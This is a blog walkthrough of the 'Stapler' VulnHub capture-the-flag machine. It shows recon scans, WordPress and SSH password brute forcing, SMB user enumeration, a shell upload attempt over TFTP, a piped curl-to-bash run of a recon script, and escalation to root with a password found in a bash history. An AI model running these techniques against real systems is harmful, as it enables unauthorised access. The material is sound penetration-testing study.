Stapler: 1
This is another challenge from my OSCP list. It is a challenge from 2016 and this is from its description:
+---------------------------------------------------------+ | | | __..--''\ | | __..--'' \ | | __..--'' __..--'' | | __..--'' __..--'' | | | \ o __..--''____....----"" | | \__..--''\ | | | \ | | +----------------------------------+ | | +----------------------------------+ | | | +- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+ | Name: Stapler | IP: DHCP | | Date: 2016-June-08 | Goal: Get Root! | | Author: g0tmi1k | Difficultly: ??? ;) | +- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+ | | | + Average beginner/intermediate VM, only a few twists | | + May find it easy/hard (depends on YOUR background) | | + ...also which way you attack the box | | | | + It SHOULD work on both VMware and Virtualbox | | + REBOOT the VM if you CHANGE network modes | | + Fusion users, you'll need to retry when importing | | | | + There are multiple methods to-do this machine | | + At least two (2) paths to get a limited shell | | + At least three (3) ways to get a root access | | | | + Made for BsidesLondon 2016 | | + Slides: https://download.vulnhub.com/media/stapler/ | | | | + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman | | + ...and shout-outs to the VulnHub-CTF Team =) | | | +- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+ | | | --[[~~Enjoy. Have fun. Happy Hacking.~~]]-- | | | +---------------------------------------------------------+
Let’s start…..
Recon
What ports are open and what services are running?
root@redteam:~# nmap -n -v -T4 -sS -sV -sC -p- 192.168.50.136
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-29 20:08 CEST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Nmap scan report for stapler (192.168.50.136)
Host is up (0.00040s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.50.135
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
| id.server: AMS
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, LongPassword, ConnectWithDatabase, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, SupportsCompression, DontAllowDatabaseTableColumn, LongColumnFlag, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: g\\x0B\x16M\x1C%\x1F(5\x11 DZ\x01?\x1Eq\x7FI
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:BD:3B:EA (VMware)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 34m37s, median: 1h59m58s
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| RED<00> Flags: <unique><active>
| RED<03> Flags: <unique><active>
| RED<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2019-05-29T21:09:48+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-05-29 22:09:48
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.64 seconds
Raw packets sent: 131126 (5.770MB) | Rcvd: 80 (3.372KB)
That’s a long list of ports and services. At first glance there is an FTP server with anonymous login enabled.
There are also 2 webservers, a samba server and a MySQL server running.
Finally there is also something returning output on port 666.
If you can’t remember the default service running on a port, you can check a list on Linux for the specific port/service.
As an example, I’m going to check out port 3306.
root@redteam:~# cat /etc/services | grep 3306 mysql 3306/tcp mysql 3306/udp
FTP
Anonymous login is enable, so let’s see what is inside.
root@redteam:~# ftp ftp> open red Connected to red. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (red:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>
Collected a possible username: harry
But what banner?
root@redteam:~# ssh 192.168.50.136 The authenticity of host '192.168.50.136 (192.168.50.136)' can't be established. ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.50.136' (ECDSA) to the list of known hosts. ----------------------------------------------------------------- ~ Barry, don't forget to put a message here ~ -----------------------------------------------------------------
No password yet, so moving on.
ftp> ls -lah 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 Jun 04 2016 . drwxr-xr-x 2 0 0 4096 Jun 04 2016 .. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp> get note local: note remote: note 200 Switching to Binary mode. 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 226 Transfer complete. 107 bytes received in 0.00 secs (105.9758 kB/s)
root@redteam:~# cat note Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Two more possible usernames: elly and john.
The usernames, I put into a list for later use.
root@redteam:~# echo -e "harry\nelly\njohn" > usernames.txt
Port 666
When connecting with port 666 it returns unreadable output which I redirect into a file.
root@redteam:~# nc -v red 666 | tee -a output root@redteam:~# file output output: Zip archive data, at least v2.0 to extract
A zip file.
root@redteam:~# unzip output Archive: output inflating: message2.jpg
Another possible username. The message about segmentation fault could suggest a buffer overflow.
root@redteam:~# exiftool message2.jpg ExifTool Version Number : 11.16 File Name : message2.jpg Directory : . File Size : 13 kB File Modification Date/Time : 2016:06:03 17:03:07+02:00 File Access Date/Time : 2019:05:29 20:54:52+02:00 File Inode Change Date/Time : 2019:05:29 20:53:20+02:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : None X Resolution : 72 Y Resolution : 72 Current IPTC Digest : 020ab2da2a37c332c141ebf819e37e6d Contact : If you are reading this, you should get a cookie! Application Record Version : 4 IPTC Digest : d41d8cd98f00b204e9800998ecf8427e Image Width : 364 Image Height : 77 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1) Image Size : 364x77 Megapixels : 0.028
It looks like there is some useful meta-data inside this picture. Getting a cookie? Ok.
Webservers
I thought I would get a cookie when browsing the website at port 12380, but no cookie.
There are some comments in the source page.
title>Tim, we need to-do better next year for Initech</title>
<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->
More usernames for the file.
My directory brute force attempts came up empty. So maybe Nikto has better luck.
root@redteam:~# nikto -h http://192.168.50.136 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.50.136 + Target Hostname: 192.168.50.136 + Target Port: 80 + Start Time: 2019-05-29 22:17:40 (GMT2) --------------------------------------------------------------------------- + Server: No banner retrieved + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response + Scan terminated: 20 error(s) and 5 item(s) reported on remote host + End Time: 2019-05-29 22:18:00 (GMT2) (20 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
root@redteam:~# nikto -h 192.168.50.136:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.50.136
+ Target Hostname: 192.168.50.136
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2019-05-29 22:17:55 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '192.168.50.136' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2019-05-29 22:20:59 (GMT2) (184 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
These scans look promising. In the first one there is a file found that resides in the home folder of a user. So maybe LFI possibilities.
The second scan shows the existence of a robots.txt file, which has 2 entries. Also, there is a phpmyadmin page and there is an SSL certificate with some useful information.
It seems I checked out HTTP, but forgot HTTPS. When browsing to /admin112233/ I get a pop-up.
The blogblog takes me to a wordpress site and I navigate to the wp-admin page.
So there is a john user, but the password is just not correct. Time for wpscan.
With the use of wpscan in this case it’s important to note that the option –disable-tls-checks is very important.
Without the option the scan will abort because of the certificate.
The scan says the current WordPress runs on version 4.2.1. And this version has some vulnerabilities.
I also got some valid credentials. So that was something I wanted to investigate first, as it’s relatively easy.
[i] User(s) Identified: [+] john | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] barry | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] elly | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] peter | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] heather | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] garry | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] harry | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] scott | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] tim | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] kathy | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] Performing password attack on Xmlrpc Multicall against 1 user/s [SUCCESS] - john / incorrect All Found Progress Time: 00:05:32 <========== > (155 / 1999) 7.75% ETA: ??:??:?? [i] Valid Combinations Found: [SUCCESS] - garry / football [SUCCESS] - harry / monkey [SUCCESS] - scott / cookie [SUCCESS] - tim / thumb [SUCCESS] - kathy / coolgirl [SUCCESS] - john / incorrect
For brute forcing the passwords I used a password list from SecLists.
I tried Harry first, but this user has no useful rights. So I try Tim next.
Tim has the same rights, so does Kathy. They can’t do anything without it first needs to be approved by the admin…….and it looks like that is John.
To get a reverse shell there are several ways to get this done. But in this case it wasn’t that simple. What did I try:
- altering the 404 page by replacing the php code with the code from pentestmonkey. This didn’t work because the files weren’t writable.
- installing a plugin. This also did not work, because I needed to give the FTP credentials.
After some time I decided to move on to another service, because there was much more to go on. Maybe I would find something useful along the way.
SMB
Because connecting to the MySQL server needs a password I go for the SMB server.
root@redteam:~# smbclient -L 192.168.50.136 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers kathy Disk Fred, What are we doing here? tmp Disk All temporary files should be stored here IPC$ IPC IPC Service (red server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP RED
root@redteam:~/tmp/backup# smbmap -H 192.168.50.136 -P 139 [+] Finding open SMB ports.... [+] Guest RPC session established on 192.168.50.136... [+] IP: 192.168.50.136:139 Name: red Disk Permissions ---- ----------- print$ NO ACCESS kathy READ ONLY tmp READ, WRITE IPC$ NO ACCESS
Another option that Kali has to enumerate an SMB server is a perl script named enum4linux. This script has many option, but for now I’m going to enumerate users via RID cycling.
S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1005 Unix User\SHayslett (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud (Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1019 Unix User\Sam (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1021 Unix User\jess (Local User) S-1-22-1-1022 Unix User\SHAY (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1024 Unix User\mel (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1026 Unix User\zoe (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User)
Now to filter out the usernames and store them in the usernames.txt file.
root@redteam:~# cat rid.list | cut -d '\' -f2 | awk '{print $1}' | tr [:upper:] [:lower:] >> usernames.txt
After checking the list, it seems that I have duplicates.
root@redteam:~# cat usernames.txt | sort -u > usernames.list
From the scans it looks like the tmp share is writable, but let’s try the Kathy share first.
root@redteam:~# smbclient \\\\192.168.50.136\\kathy Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls -lah NT_STATUS_NO_SUCH_FILE listing \-lah smb: \> ls . D 0 Fri Jun 3 18:52:52 2016 .. D 0 Mon Jun 6 23:39:56 2016 kathy_stuff D 0 Sun Jun 5 17:02:27 2016 backup D 0 Sun Jun 5 17:04:14 2016 19478204 blocks of size 1024. 16396568 blocks available
From this share I get 3 files
-rw-r--r-- 1 root root 64 May 29 21:29 todo-list.txt -rw-r--r-- 1 root root 5.9K May 29 21:29 vsftpd.conf -rw-r--r-- 1 root root 6.1M May 29 21:30 wordpress-4.tar.gz
root@redteam:~/tmp# cat todo-list.txt I'm making sure to backup anything important for Initech, Kathy
listen=YES listen_ipv6=NO anonymous_enable=YES anon_root=/var/ftp/anonymous local_enable=YES dirmessage_enable=YES use_localtime=YES xferlog_enable=YES connect_from_port_20=YES banner_file=/etc/vsftpd.banner chroot_local_user=YES userlist_enable=YES local_root=/etc secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key ssl_enable=NO pasv_enable=no
Now for the tmp share.
root@redteam:~/tmp/backup# smbclient \\\\192.168.50.136\\tmp Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed May 29 23:39:18 2019 .. D 0 Mon Jun 6 23:39:56 2016 ls N 274 Sun Jun 5 17:32:58 2016 19478204 blocks of size 1024. 16396552 blocks available
root@redteam:~/tmp/backup# cat ls .: total 12.0K drwxrwxrwt 2 root root 4.0K Jun 5 16:32 . drwxr-xr-x 16 root root 4.0K Jun 3 22:06 .. -rw-r--r-- 1 root root 0 Jun 5 16:32 ls drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
An ASCII file with a listing of a filesystem. From here I can’t really do anything with it.
UDP
Because of the use of FTP in this challenge I decided to check another angle.
root@redteam:~# cat /etc/services | grep ftp ftp-data 20/tcp ftp 21/tcp tftp 69/udp
root@redteam:~# nmap -n -T4 -sU -sV -sC -p 69 192.168.50.136 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-31 10:59 CEST Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 0.00% done Nmap scan report for 192.168.50.136 Host is up (0.00024s latency). PORT STATE SERVICE VERSION 69/udp open|filtered tftp MAC Address: 00:0C:29:BD:3B:EA (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 99.99 seconds
Nmap is not sure. We can try it anyway.
root@redteam:~/stapler# tftp 192.168.50.136 tftp> status Connected to 192.168.50.136. Mode: netascii Verbose: off Tracing: off Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
Cool. Let’s see if we can upload a file.
tftp> verbose on Verbose mode on. tftp> mode Using netascii mode to transfer files. tftp> put shell.php putting shell.php to 192.168.50.136:shell.php [netascii] Sent 5688 bytes in 0.0 seconds [inf bits/sec]
Unfortunately the script wasn’t anywhere to be found.
SSH
I really don’t like brute forcing, mostly because it can take a very long time and it is very noisy.
But in this case I give it a shot.
root@redteam:~/stapler# hydra -L rid.list -P rid.list 192.168.50.136 ssh Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-31 11:38:42 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 841 login tries (l:29/p:29), ~53 tries per task [DATA] attacking ssh://192.168.50.136:22/ [22][ssh] host: 192.168.50.136 login: SHayslett password: SHayslett
And this is why I don’t like brute forcing. Before I found these credentials I tried several lists from SecLists first and then the rockyou list.
When that didn’t work I almost gave up on this option and only as a last attempt I used the info I found during this pentest, which was more luck than wisdom.
EoP
SHayslett@red:~$ ls -lah /home total 128K drwxr-xr-x 32 root root 4.0K Jun 4 2016 . drwxr-xr-x 22 root root 4.0K Jun 7 2016 .. drwxr-xr-x 2 AParnell AParnell 4.0K Jun 5 2016 AParnell drwxr-xr-x 2 CCeaser CCeaser 4.0K Jun 5 2016 CCeaser drwxr-xr-x 2 CJoo CJoo 4.0K Jun 5 2016 CJoo drwxr-xr-x 2 Drew Drew 4.0K Jun 5 2016 Drew drwxr-xr-x 2 DSwanger DSwanger 4.0K Jun 5 2016 DSwanger drwxr-xr-x 2 Eeth Eeth 4.0K Jun 5 2016 Eeth drwxr-xr-x 2 elly elly 4.0K Jun 5 2016 elly drwxr-xr-x 2 ETollefson ETollefson 4.0K Jun 5 2016 ETollefson drwxr-xr-x 2 IChadwick IChadwick 4.0K Jun 5 2016 IChadwick drwxr-xr-x 2 jamie jamie 4.0K Jun 5 2016 jamie drwxr-xr-x 2 JBare JBare 4.0K Jun 5 2016 JBare drwxr-xr-x 2 jess jess 4.0K Jun 5 2016 jess drwxr-xr-x 2 JKanode JKanode 4.0K Jun 5 2016 JKanode drwxr-xr-x 2 JLipps JLipps 4.0K Jun 5 2016 JLipps drwxr-xr-x 2 kai kai 4.0K Jun 5 2016 kai drwxr-xr-x 2 LSolum LSolum 4.0K Jun 5 2016 LSolum drwxr-xr-x 2 LSolum2 LSolum2 4.0K Jun 5 2016 LSolum2 drwxr-xr-x 2 MBassin MBassin 4.0K Jun 5 2016 MBassin drwxr-xr-x 2 mel mel 4.0K Jun 5 2016 mel drwxr-xr-x 2 MFrei MFrei 4.0K Jun 5 2016 MFrei drwxr-xr-x 2 NATHAN NATHAN 4.0K Jun 5 2016 NATHAN drwxr-xr-x 3 peter peter 4.0K Jun 3 2016 peter drwxr-xr-x 2 RNunemaker RNunemaker 4.0K Jun 5 2016 RNunemaker drwxr-xr-x 2 Sam Sam 4.0K Jun 5 2016 Sam drwxr-xr-x 2 SHAY SHAY 4.0K Jun 5 2016 SHAY drwxr-xr-x 3 SHayslett SHayslett 4.0K May 31 10:39 SHayslett drwxr-xr-x 2 SStroud SStroud 4.0K Jun 5 2016 SStroud drwxr-xr-x 2 Taylor Taylor 4.0K Jun 5 2016 Taylor drwxrwxrwx 2 www www 4.0K Jun 5 2016 www drwxr-xr-x 2 zoe zoe 4.0K Jun 5 2016 zoe
Let’s start with some basic enumeration.
Starting a python http server on port 80, while in the folder containing a recon bash script.
root@redteam:/opt/tools/shells/LinEnum# server 80 Serving HTTP on 0.0.0.0 port 80 ...
Then curling it on the remote system and piping it to bash.
This way the script will run on the remote system without the need to transfer the file first.
...[SNIP]... [-] It looks like we have some admin users: uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm) uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare) ...[SNIP]... [-] Accounts that have recently used sudo: /home/peter/.sudo_as_admin_successful ...[SNIP]... /home/JKanode/.bash_history id whoami ls -lah pwd ps aux sshpass -p thisimypassword ssh JKanode@localhost apt-get install sshpass sshpass -p JZQuyIN5 peter@localhost ps -ef top kill -9 3747 exit
It looks like Peter is the user of interest. And from the history of JKanode it looks like I have his password.
JKanode@red:~$ su peter
Password:
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.
You can:
(q) Quit and do nothing. The function will be run again next time.
(0) Exit, creating the file ~/.zshrc containing just a comment.
That will prevent this function being run again.
(1) Continue to the main menu.
(2) Populate your ~/.zshrc with the configuration recommended
by the system administrator and exit (you will need to edit
the file by hand, if so desired).
--- Type one of the keys in parentheses --- (
Aborting.
The function will be run again next time. To prevent this, execute:
touch ~/.zshrc
red% pwd
/home/JKanode
red% cd
red% pwd
/home/peter
red% ls -lah
total 72K
drwxr-xr-x 3 peter peter 4.0K Jun 3 2016 .
drwxr-xr-x 32 root root 4.0K Jun 4 2016 ..
-rw------- 1 peter peter 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 peter peter 220 Jun 3 2016 .bash_logout
-rw-r--r-- 1 peter peter 3.7K Jun 3 2016 .bashrc
drwx------ 2 peter peter 4.0K Jun 6 2016 .cache
-rw-r--r-- 1 peter peter 675 Jun 3 2016 .profile
-rw-r--r-- 1 peter peter 0 Jun 3 2016 .sudo_as_admin_successful
-rw------- 1 peter peter 577 Jun 3 2016 .viminfo
-rw-rw-r-- 1 peter peter 39K Jun 3 2016 .zcompdump
red% sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter:
Matching Defaults entries for peter on red:
lecture=always, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User peter may run the following commands on red:
(ALL : ALL) ALL
red%
Well….that’s nice.
red% sudo -i
➜ ~ pwd
/root
➜ ~ id
uid=0(root) gid=0(root) groups=0(root)
➜ ~ ls -lah
total 208K
drwx------ 4 root root 4.0K May 31 11:19 .
drwxr-xr-x 22 root root 4.0K Jun 7 2016 ..
-rw------- 1 root root 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
-rwxr-xr-x 1 root root 1.1K Jun 5 2016 fix-wordpress.sh
-rw-r--r-- 1 root root 463 Jun 5 2016 flag.txt
-rw-r--r-- 1 root root 345 Jun 5 2016 issue
-rw-r--r-- 1 root root 50 Jun 3 2016 .my.cnf
-rw------- 1 root root 1 Jun 5 2016 .mysql_history
drwxr-xr-x 11 root root 4.0K Jun 3 2016 .oh-my-zsh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 103 Jun 5 2016 python.sh
-rw------- 1 root root 1.0K Jun 5 2016 .rnd
drwxr-xr-x 2 root root 4.0K Jun 4 2016 .vim
-rw------- 1 root root 1 Jun 5 2016 .viminfo
-rw-r--r-- 1 root root 54K Jun 5 2016 wordpress.sql
-rw-r--r-- 1 root root 39K Jun 3 2016 .zcompdump
-rw-r--r-- 1 root root 39K Jun 3 2016 .zcompdump-red-5.1.1
-rw------- 1 root root 39 Jun 5 2016 .zsh_history
-rw-r--r-- 1 root root 2.8K Jun 3 2016 .zshrc
-rw-r--r-- 1 root root 17 Jun 3 2016 .zsh-update
➜ ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
And that’s the flag.
Conclusion
This was definitely a good practice to work your way through a system step by step.
Because of the many possibilities this challenge offered to get access, I found it odd that there were so many rabbit holes that turned out to be nothing and at the end a simple SSH brute force did the trick.
To compare notes I read a few walkthroughs from others that did the same challenge and with some there were different outcomes with wordpress for example.
The uploading of the plugin was no problem and there was no mentioning about FTP credentials.
Anyhow….I really liked this challenge and I would recommend it for anyone who is trying to learn more about pentesting.